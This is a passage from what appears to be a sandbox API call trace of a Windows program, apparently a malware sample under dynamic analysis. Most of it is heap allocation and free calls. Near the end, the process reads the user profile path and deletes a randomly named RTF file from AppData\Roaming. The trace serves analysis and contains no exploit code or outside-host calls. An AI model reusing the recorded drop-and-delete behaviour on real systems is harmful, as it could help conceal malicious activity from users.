dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.419] CloseHandle (hObject=0x268) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.421] CloseHandle (hObject=0x294) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.442] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.447] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0198.447] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.448] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0198.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/enrHxcENdtYHa.rtf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf", lpFilePart=0x8bedfc*="enrHxcENdtYHa.rtf") returned 0x3f [0198.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.449] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\enrhxcendtyha.rtf")) returned 0x2020 [0198.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x48584a10, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0xcb7b4b10, ftLastAccessTime.dwHighDateTime=0x1d4cc97, ftLastWriteTime.dwLowDateTime=0xcb7b4b10, ftLastWriteTime.dwHighDateTime=0x1d4cc97, nFileSizeHigh=0x0, nFileSizeLow=0x13e7, dwReserved0=0xa35, dwReserved1=0x4, cFileName="enrHxcENdtYHa.rtf", cAlternateFileName="ENRHXC~1.RTF")) returned 0xaa57a0 [0198.449] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\enrhxcendtyha.rtf")) returned 1 [0198.451] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x48584a10, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0xcb7b4b10, ftLastAccessTime.dwHighDateTime=0x1d4cc97, ftLastWriteTime.dwLowDateTime=0xcb7b4b10, ftLastWriteTime.dwHighDateTime=0x1d4cc97, nFileSizeHigh=0x0, nFileSizeLow=0x13e7, dwReserved0=0xa35, dwReserved1=0x4, cFileName="enrHxcENdtYHa.rtf", 